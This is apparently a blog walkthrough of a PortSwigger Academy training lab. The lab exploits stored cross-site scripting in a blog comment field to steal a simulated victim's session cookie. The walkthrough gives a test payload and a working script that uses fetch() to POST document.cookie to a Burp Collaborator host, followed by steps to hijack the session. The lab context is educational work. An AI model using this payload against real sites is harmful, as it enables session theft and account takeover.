Solving Portswigger Academy: Exploiting cross-site scripting to steal cookies

This lab contains a stored XSS vulnerability in the blog comments function. A simulated victim user views all comments after they are posted. To solve the lab, exploit the vulnerability to exfiltrate the victim’s session cookie, then use this cookie to impersonate the victim.

So in this lab we need to steal the session cookie of the user and use it to login.

As soon as you access the lab, you will notice the website with different blogs. We need to test if it is vulnerable to XSS first.

I clicked on a blog and saw a Comment function. I will first test the Comment field. Let’s first add <img src=x onerror=prompt()> in the field and fill rest of the fields with necessary comments.

As soon as I visit the blog I saw a prompt. Which indicates XSS vulnerability.

Let’s now use script to fetch the cookie for that we need a collaborator. Will use below payload.

<script>
  fetch('https://<SESSION>.burpcollaborator.net', {
  method: 'POST',
  mode: 'no-cors',
  body: document.cookie
  });
</script>

Now we it is a java script as you see with <script> tag. Then I used fetch method. You can read about the method here.

Start the collaborator and copy the ID in above script and store it in comment section, you will see the data.

Now use this session cookie in browser.